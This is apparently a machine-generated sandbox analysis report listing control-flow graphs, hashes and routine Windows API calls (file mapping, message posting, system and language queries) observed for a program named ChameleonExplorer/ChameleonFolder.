                                                                                                            execution_graph 3080 3337ee0 3081 3337f19 3080->3081 3082 3337f00 3080->3082 3081->3082 3083 3337f40 PostMessageW 3081->3083 3083->3082 3084 327e300 3085 327e321 3084->3085 3087 327e3b5 3084->3087 3086 327e3a9 GetNativeSystemInfo 3085->3086 3085->3087 3086->3087 3088 333ecdb 3090 33437e8 3088->3090 3089 3343b62 3090->3089 3092 33382b0 3090->3092 3093 33382ca 3092->3093 3097 3338313 3092->3097 3094 33382d2 CreateFileMappingW 3093->3094 3093->3097 3095 3338326 MapViewOfFile 3094->3095 3094->3097 3095->3097 3097->3089
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.000000000333C000.00000020.00000001.01000000.00000011.sdmp, Offset: 0333C000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_333c000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d60f8929764bcb4e8e48305e511a2863114631a97fccbb23d8fbaf06acf2663b
                                                                                                            • Instruction ID: a469887753dd29e1d3cf8742ad95ce92fa2f5569df249a74845f1bd248020249
                                                                                                            • Opcode Fuzzy Hash: d60f8929764bcb4e8e48305e511a2863114631a97fccbb23d8fbaf06acf2663b
                                                                                                            • Instruction Fuzzy Hash: E2F332A644E7C05FCB42CB78C9D6692BFF5AE1721070B54D7C081CF1A3D618BA2BA716

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 248 33382b0-33382c4 249 333839b-33383a6 248->249 250 33382ca-33382cc 248->250 251 33383b7-33383c2 249->251 252 33383a8-33383b0 249->252 253 33382d2-3338311 CreateFileMappingW 250->253 254 33383d8-33383dd 250->254 255 33383d3 251->255 256 33383c4-33383cc 251->256 252->251 257 3338313-3338321 253->257 258 3338326-3338369 MapViewOfFile 253->258 255->254 256->255 257->254 260 3338394 258->260 261 333836b-333838d 258->261 263 3338399 260->263 261->260 263->254
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE ref: 033382F7
                                                                                                            • MapViewOfFile.KERNELBASE ref: 03338356
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.0000000003337000.00000020.00000001.01000000.00000011.sdmp, Offset: 03337000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_3337000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: H
                                                                                                            • API String ID: 3452162329-2852464175
                                                                                                            • Opcode ID: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction ID: 3caf7420794419d252ebf0af915bf7bff638cc6b6b7110c6854423d47df45c57
                                                                                                            • Opcode Fuzzy Hash: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction Fuzzy Hash: F7313E74114A0C8FEB94EF2CD88476577E1FB59314F448665E10ACB3B0DB78D885CB01

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 264 327e300-327e31b 265 327e321-327e3a7 call 327e6b0 264->265 266 327e67a-327e684 264->266 272 327e3b5-327e3dd 265->272 273 327e3a9-327e3b0 GetNativeSystemInfo 265->273 274 327e3f1-327e40d 272->274 275 327e3df-327e3e6 272->275 273->272 278 327e415-327e417 274->278 276 327e45e-327e47c 275->276 277 327e3e8-327e3ef 275->277 282 327e5d2-327e5de 276->282 283 327e482-327e487 276->283 277->274 277->276 279 327e431-327e458 278->279 280 327e419-327e429 278->280 279->276 280->279 284 327e5f1-327e604 282->284 285 327e5e0-327e5e2 282->285 286 327e4be-327e4ca 283->286 287 327e489-327e48e 283->287 284->266 288 327e606-327e619 285->288 289 327e5e4-327e5e9 285->289 291 327e4cc-327e4ce 286->291 292 327e4eb-327e4f2 286->292 287->266 290 327e494-327e4a0 287->290 288->266 289->266 293 327e5ef-327e622 289->293 290->266 297 327e4a6-327e4b9 290->297 298 327e524-327e52b 291->298 299 327e4d0-327e4d5 291->299 294 327e4f4-327e507 292->294 295 327e50c-327e51f 292->295 311 327e624-327e62c 293->311 312 327e643-327e650 293->312 294->266 295->266 297->266 302 327e545-327e558 298->302 303 327e52d-327e540 298->303 304 327e55d-327e564 299->304 305 327e4db-327e4e0 299->305 302->266 303->266 306 327e566-327e579 304->306 307 327e57e-327e591 304->307 305->266 308 327e4e6-327e5a0 call 327e2a0 305->308 306->266 307->266 326 327e5a2-327e5b5 308->326 327 327e5ba-327e5cd 308->327 311->312 315 327e62e-327e641 311->315 322 327e667-327e66f 312->322 323 327e652-327e665 312->323 315->266 322->266 323->266 326->266 327->266
                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNEL32 ref: 0327E3B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.000000000327E000.00000020.00000001.01000000.00000011.sdmp, Offset: 0327E000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_327e000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoNativeSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1721193555-0
                                                                                                            • Opcode ID: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
                                                                                                            • Instruction ID: a12524dc196f45218158ae5b83b844986a364f2b42d5d9560518bef76d8aafe4
                                                                                                            • Opcode Fuzzy Hash: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
                                                                                                            • Instruction Fuzzy Hash: 71918C3113560A8EEB21EF28ED507E637A5FB14344F458267DC07C62A0EAB8E5C5CBA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 331 3337ee0-3337efe 332 3337f00-3337f17 331->332 333 3337f19-3337f1f 331->333 338 3337f85-3337f8e 332->338 334 3337f21-3337f37 333->334 335 3337f39-3337f3a 333->335 337 3337f3c-3337f3e 334->337 335->337 339 3337f63-3337f82 337->339 340 3337f40-3337f5e PostMessageW 337->340 339->338 340->339
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.0000000003337000.00000020.00000001.01000000.00000011.sdmp, Offset: 03337000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_3337000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: cfea4c8f6f5f84a2c6ebdfae95283b3ac1f83e9cbb844c77a03b184a5d3c0d09
                                                                                                            • Instruction ID: c90e59041c40c2d46ef689024e9d32302449d391e7c8106db7cbea0275de1722
                                                                                                            • Opcode Fuzzy Hash: cfea4c8f6f5f84a2c6ebdfae95283b3ac1f83e9cbb844c77a03b184a5d3c0d09
                                                                                                            • Instruction Fuzzy Hash: FB21F370224A8CDFDF58EF1CD881AA937E2FF29344F544165E909C7261C775E881CB81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 342 3254e25-3254e28 343 3254e44-3254e53 342->343 344 3254e2a-3254e3a 342->344 346 3254eec-3254eee 343->346 347 3254e59-3254e68 343->347 348 3254e6d-3254e7c 344->348 349 3254e3c-3254e3f 344->349 350 3254ef5-3254eff 346->350 351 3254ef0 call 3254850 346->351 347->348 348->346 349->343 353 3254f05-3254f48 350->353 354 3254f94-3254fa0 350->354 351->350 355 3254f5e-3254f5f 353->355 356 3254f4a-3254f55 353->356 357 3254fa2-3254fb6 354->357 358 3254fcc-3254fd2 call 3254a10 354->358 355->354 356->355 359 3254f57 356->359 360 3254fb8 357->360 361 3254fba-3254fca 357->361 364 3254fd7-3254fdd 358->364 359->355 360->361 363 3254ff1 361->363 364->363 365 3254fdf-3254fe7 364->365 365->363
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.0000000003251000.00000020.00000001.01000000.00000011.sdmp, Offset: 03251000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_3251000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 389f5320ad7093fa945a599d697ecaceda258c413693d1ce816d310bb983f33e
                                                                                                            • Instruction ID: 3237928fa02905fb1f501bee0c4f0447915155e8691cebbbb7040a7eb24d4ee6
                                                                                                            • Opcode Fuzzy Hash: 389f5320ad7093fa945a599d697ecaceda258c413693d1ce816d310bb983f33e
                                                                                                            • Instruction Fuzzy Hash: 6B41F371424A568FCB68EF1DD4D4320F7E0FB65314B29828AEC49CB656D774DAC2CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 366 746290-7462fc 367 746305-746321 366->367 368 746323-746346 367->368 369 74634d-74635b 367->369 368->369 370 74635d-74636a call 747030 369->370 371 74636f-74637e 369->371 370->371
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2927494034.0000000000746000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00746000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_746000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4bcff77bc2721812a55f674d8f4f993d9885c91fae5973ce83b17af82195670f
                                                                                                            • Instruction ID: 32daaff3484038da6393a300b38faf94b765424933544a14b42670ef0bbccaf6
                                                                                                            • Opcode Fuzzy Hash: 4bcff77bc2721812a55f674d8f4f993d9885c91fae5973ce83b17af82195670f
                                                                                                            • Instruction Fuzzy Hash: 3B31FB30224A4C9FCB84EF18C885FA977E1FB59304F8551A5F84EC7252DB35E985CB81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 376 3254a10-3254a33 call 3254970 call 3254680 380 3254a38-3254a3e 376->380 381 3254a97-3254aa2 380->381 382 3254a40-3254a95 380->382 383 3254aa4-3254aa9 381->383 382->383
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.0000000003251000.00000020.00000001.01000000.00000011.sdmp, Offset: 03251000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_3251000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9bb406301e24437c841f3dc2675e0d29e136f589c5054ba5dd485402079a7ca4
                                                                                                            • Instruction ID: 88508bc51467204fd4a93c1d725cdd74278502713e565072f87d670f6583768a
                                                                                                            • Opcode Fuzzy Hash: 9bb406301e24437c841f3dc2675e0d29e136f589c5054ba5dd485402079a7ca4
                                                                                                            • Instruction Fuzzy Hash: D7018FB1611F0D8FD784EF69959C32A7AD6F729305F20007EB84DCB678C6B184C68B80

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 384 746870-746882 385 746884-746891 384->385 386 7468cf-7468d6 384->386 385->386 387 746893-7468bd call 746140 385->387 390 7468c4-7468c8 387->390 390->386
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2927494034.0000000000746000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00746000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_746000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 337d149f2599faf40f8f4b5b24f55f0b289ac114d62a12b1cb2572cf3c548eee
                                                                                                            • Instruction ID: 0355798b0d21a49fb4ed39ecd7839df75424e87a042872653b34b1a436bb28d2
                                                                                                            • Opcode Fuzzy Hash: 337d149f2599faf40f8f4b5b24f55f0b289ac114d62a12b1cb2572cf3c548eee
                                                                                                            • Instruction Fuzzy Hash: DCF05031714F194BC764B76D685DBA637D6FB8D311F0401BAA446CB242DF28DD0683D2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 405 746840-74685e call 746870 407 746863-746867 405->407
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2927494034.0000000000746000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00746000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_746000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dc87781c06a949e6809458a0363eb14191e86d4ac667f2f4b8a5f1a2f0eb017e
                                                                                                            • Instruction ID: 4ab4d2b3a869eeab1aeb32a94e0eeeeab0180f802aa0ae5602ed6bd09d1d13de
                                                                                                            • Opcode Fuzzy Hash: dc87781c06a949e6809458a0363eb14191e86d4ac667f2f4b8a5f1a2f0eb017e
                                                                                                            • Instruction Fuzzy Hash: BDD01240619AD80ACA4D637D08697643EE0AB5E109F8805FDA4CDDA243D64E82864393

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 408 746140-74615c
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2927494034.0000000000746000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00746000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_746000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8e03f64bbd47964890b2e18fe4a3a28b7ee9f174fbae2c66631e9062f43b4305
                                                                                                            • Instruction ID: 881525bc5ec10a888784033b76c6ba394d4a63fe85feea939d294398114af9ab
                                                                                                            • Opcode Fuzzy Hash: 8e03f64bbd47964890b2e18fe4a3a28b7ee9f174fbae2c66631e9062f43b4305
                                                                                                            • Instruction Fuzzy Hash: 93C02B20320D1C0FCF48FEFD04CA33061C0E31C211F8000F5B80CCB243D15948A08301

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 410 3269b40-3269b52 411 3269b54-3269b55 410->411 412 3269b6c-3269b70 410->412 413 3269b60-3269b61 411->413 413->412
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.0000000003269000.00000020.00000001.01000000.00000011.sdmp, Offset: 03269000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_3269000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 27b82fb93593e14b94ca17fc8e8b4daf4b4b6affc90cb308ffe96dbe6b776e98
                                                                                                            • Instruction ID: 5b0c23ad9f1f53ef7944190032017f5bcb29a15861602131c2b23b4630cd8e56
                                                                                                            • Opcode Fuzzy Hash: 27b82fb93593e14b94ca17fc8e8b4daf4b4b6affc90cb308ffe96dbe6b776e98
                                                                                                            • Instruction Fuzzy Hash: 91D0A73103850945CB19EB30DC455A13264F7002347800355C823C04F0FA7C12D8D641

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 414 3270a40-3270a48 415 3270a4e-3270a54 414->415 416 3270a4a-3270a4b 414->416 417 3270a56-3270a57 415->417 418 3270a5a-3270a63 415->418 416->415 417->418 419 3270a69-3270a6c 418->419 420 3270b28-3270b2a 418->420 419->420 421 3270a72-3270a74 419->421 422 3270a76-3270a7c 421->422 423 3270a7e-3270a7f 421->423 424 3270a81-3270a87 422->424 423->424 425 3270b27 424->425 426 3270a8d-3270a9e 424->426 425->420 427 3270aa0-3270ab4 426->427 428 3270b1a-3270b21 426->428 429 3270ab6-3270ab9 427->429 430 3270ada-3270af4 427->430 428->425 428->426 432 3270ac3-3270ac6 429->432 433 3270abb-3270abe 429->433 430->428 431 3270af6-3270af9 430->431 436 3270b03-3270b06 431->436 437 3270afb-3270afe 431->437 434 3270ad0-3270ad2 432->434 435 3270ac8-3270acb 432->435 433->432 438 3270ac0 433->438 434->430 440 3270ad4-3270ad8 434->440 435->434 439 3270acd 435->439 442 3270b10-3270b12 436->442 443 3270b08-3270b0b 436->443 437->436 441 3270b00 437->441 438->432 439->434 440->420 441->436 442->428 445 3270b14-3270b18 442->445 443->442 444 3270b0d 443->444 444->442 445->420
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.0000000003269000.00000020.00000001.01000000.00000011.sdmp, Offset: 03269000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_3269000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: a$a$z$z
                                                                                                            • API String ID: 0-3217829273
                                                                                                            • Opcode ID: e549a898086fe992de222b4ed16a90abae3ac20dd35349c3e5caa1a660c80229
                                                                                                            • Instruction ID: 16257eebbcd2d01d0da1cf4889ee4d8d2dbfde4c80ba7b0f524cf27bf2459233
                                                                                                            • Opcode Fuzzy Hash: e549a898086fe992de222b4ed16a90abae3ac20dd35349c3e5caa1a660c80229
                                                                                                            • Instruction Fuzzy Hash: 8221F22AB76A2F021B3C986C5CDC27EE185F71570DB3EE27ACA83D6305C4A099CF0185

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:30
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 27541 29e9b9c 27542 29e9bac 27541->27542 27546 29e9bd8 27541->27546 27543 29e9bb2 CreateFileMappingW 27542->27543 27542->27546 27544 29e9be6 MapViewOfFile 27543->27544 27543->27546 27544->27546 27547 29e988c 27548 29e98b2 27547->27548 27549 29e989a 27547->27549 27548->27549 27550 29e98bd PostMessageW 27548->27550 27550->27549 27551 295af3c 27553 295af44 27551->27553 27552 295af80 27553->27552 27555 29595fc 27553->27555 27557 295960b 27555->27557 27558 2959621 27555->27558 27557->27558 27559 29595b4 27557->27559 27558->27552 27560 29595c4 27559->27560 27561 29595e0 27559->27561 27563 295a82c 27560->27563 27561->27558 27564 295a86d 27563->27564 27567 295a708 27564->27567 27566 295a8a6 27566->27561 27569 295a729 27567->27569 27568 295a7a4 27568->27566 27569->27568 27573 2959df4 27569->27573 27571 295a7c0 27571->27568 27572 2959df4 6 API calls 27571->27572 27572->27568 27574 2959e17 27573->27574 27575 2959e20 27574->27575 27577 2959cd8 6 API calls 27574->27577 27575->27571 27577->27575

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 30 29e9b9c-29e9ba6 31 29e9c3f-29e9c47 30->31 32 29e9bac 30->32 33 29e9c49-29e9c50 31->33 34 29e9c56-29e9c5e 31->34 35 29e9c72-29e9c74 32->35 36 29e9bb2-29e9bd6 CreateFileMappingW 32->36 33->34 37 29e9c6d call 29e7348 34->37 38 29e9c60-29e9c67 34->38 39 29e9bd8-29e9be1 36->39 40 29e9be6-29e9c15 MapViewOfFile 36->40 37->35 38->37 39->35 43 29e9c38 call 29e7328 40->43 44 29e9c17-29e9c31 40->44 46 29e9c3d 43->46 44->43 46->35
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 029E9BC1
                                                                                                            • MapViewOfFile.KERNELBASE(029F350C,00000006,00000000,00000000,00000028,?), ref: 029E9C04
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 029E9BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2011930287.0000000002961000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02961000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_2961000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3452162329-4124573863
                                                                                                            • Opcode ID: d81083a408626354d8b178e76fa58dbeed5c51872e148d88eefeb74327e76cb8
                                                                                                            • Instruction ID: 9a8c73d621481da8d0f03613b1d7875a321de463aa5410533563a2cc312c40fa
                                                                                                            • Opcode Fuzzy Hash: d81083a408626354d8b178e76fa58dbeed5c51872e148d88eefeb74327e76cb8
                                                                                                            • Instruction Fuzzy Hash: B4216F74688340EFEB91EFA8D846B1477E5AB89720F004595E60ADB3D0C774E840CF18

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 107 29e988c-29e9898 108 29e989a-29e98b0 107->108 109 29e98b2-29e98bb 107->109 113 29e98fb-29e9900 108->113 110 29e98dc-29e98f8 109->110 111 29e98bd-29e98d7 PostMessageW 109->111 110->113 111->110
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(00D60000,029F940C,?,?), ref: 029E98D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2011930287.0000000002961000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02961000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_2961000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: b091d2b159dfa42d8a177c04cec7d82eb1aca69306704807c0f6d80c56b0ef4f
                                                                                                            • Instruction ID: 8e7859601cc9cf42b74843a11cb1ef8c52de9fabcfa61e50f2a4275fd77da926
                                                                                                            • Opcode Fuzzy Hash: b091d2b159dfa42d8a177c04cec7d82eb1aca69306704807c0f6d80c56b0ef4f
                                                                                                            • Instruction Fuzzy Hash: CD1163B5A44248EFDB80DF9CD880E9A77ECAB4D360B008545FA19DB350C334E9509F64
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 02959CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 02959D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 02959DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 02959DD7
                                                                                                              • Part of subcall function 02959C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,02959D55), ref: 02959CAB
                                                                                                              • Part of subcall function 02959C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,02959D55), ref: 02959CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2011930287.0000000002951000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02951000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_2951000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 52b59fb83b88076b3551e8e58da27165bcc577fb1e244c25cc0011abbf196dcd
                                                                                                            • Instruction ID: 7930c18567f74be4335a90e120402ce5b7e0588c817a911c1466bfc0f8cbd141
                                                                                                            • Opcode Fuzzy Hash: 52b59fb83b88076b3551e8e58da27165bcc577fb1e244c25cc0011abbf196dcd
                                                                                                            • Instruction Fuzzy Hash: 9F315070F0422ADBEB50DFE8D884AEEB3B9FF44315F404565E915E7280E774AA05CB90

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:30
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 27379 29daf3c 27381 29daf44 27379->27381 27380 29daf80 27381->27380 27383 29d95fc 27381->27383 27384 29d9621 27383->27384 27385 29d960b 27383->27385 27384->27380 27385->27384 27387 29d95b4 27385->27387 27388 29d95e0 27387->27388 27389 29d95c4 27387->27389 27388->27384 27391 29da82c 27389->27391 27392 29da86d 27391->27392 27395 29da708 27392->27395 27394 29da8a6 27394->27388 27396 29da729 27395->27396 27397 29da7a4 27396->27397 27401 29d9df4 27396->27401 27397->27394 27399 29da7c0 27399->27397 27400 29d9df4 6 API calls 27399->27400 27400->27397 27402 29d9e17 27401->27402 27404 29d9e20 27402->27404 27405 29d9cd8 6 API calls 27402->27405 27404->27399 27405->27404 27406 2a6988c 27407 2a698b2 27406->27407 27408 2a6989a 27406->27408 27407->27408 27409 2a698bd PostMessageW 27407->27409 27409->27408 27410 2a69b9c 27411 2a69bac 27410->27411 27412 2a69bd8 27410->27412 27411->27412 27413 2a69bb2 CreateFileMappingW 27411->27413 27413->27412 27414 2a69be6 MapViewOfFile 27413->27414 27414->27412

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 30 2a69b9c-2a69ba6 31 2a69c3f-2a69c47 30->31 32 2a69bac 30->32 35 2a69c56-2a69c5e 31->35 36 2a69c49-2a69c50 31->36 33 2a69c72-2a69c74 32->33 34 2a69bb2-2a69bd6 CreateFileMappingW 32->34 39 2a69be6-2a69c15 MapViewOfFile 34->39 40 2a69bd8-2a69be1 34->40 37 2a69c60-2a69c67 35->37 38 2a69c6d call 2a67348 35->38 36->35 37->38 38->33 43 2a69c17-2a69c31 39->43 44 2a69c38 call 2a67328 39->44 40->33 43->44 47 2a69c3d 44->47 47->33
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 02A69BC1
                                                                                                            • MapViewOfFile.KERNELBASE(02A7350C,00000006,00000000,00000000,00000028,?), ref: 02A69C04
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 02A69BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.2007723960.00000000029E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029E1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_17_2_29e1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3452162329-4124573863
                                                                                                            • Opcode ID: 99fe8e6301cb2254b5af704402e84289fafe75844e975147a367cc2446785cd4
                                                                                                            • Instruction ID: e8e9d0d7a6698ff21e1f4fe5797949d1d734316d6bf5950f6d7b377992873c85
                                                                                                            • Opcode Fuzzy Hash: 99fe8e6301cb2254b5af704402e84289fafe75844e975147a367cc2446785cd4
                                                                                                            • Instruction Fuzzy Hash: 90213534A84201EFDB11DBA8D889F167BE6AB4A710F118595E6509B390CF70E856EF18

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 107 2a6988c-2a69898 108 2a698b2-2a698bb 107->108 109 2a6989a-2a698b0 107->109 110 2a698dc-2a698f8 108->110 111 2a698bd-2a698d7 PostMessageW 108->111 114 2a698fb-2a69900 109->114 110->114 111->110
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(02920000,02A7940C,?,?), ref: 02A698D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.2007723960.00000000029E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 029E1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_17_2_29e1000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 119a6f8fc235d389dd79eb9d45e23824885d911cfcd1525a66a09d5fc1092050
                                                                                                            • Instruction ID: 3abac7d7a64d9119edd7dca7c90cb9d7530d5646089b2acad902f7d64bddf6ca
                                                                                                            • Opcode Fuzzy Hash: 119a6f8fc235d389dd79eb9d45e23824885d911cfcd1525a66a09d5fc1092050
                                                                                                            • Instruction Fuzzy Hash: 35115EB6A40209EFCB40DF9CD884E9A77E8AB4D350F008545FA18DB350C730EA51AF64
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 029D9CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 029D9D47
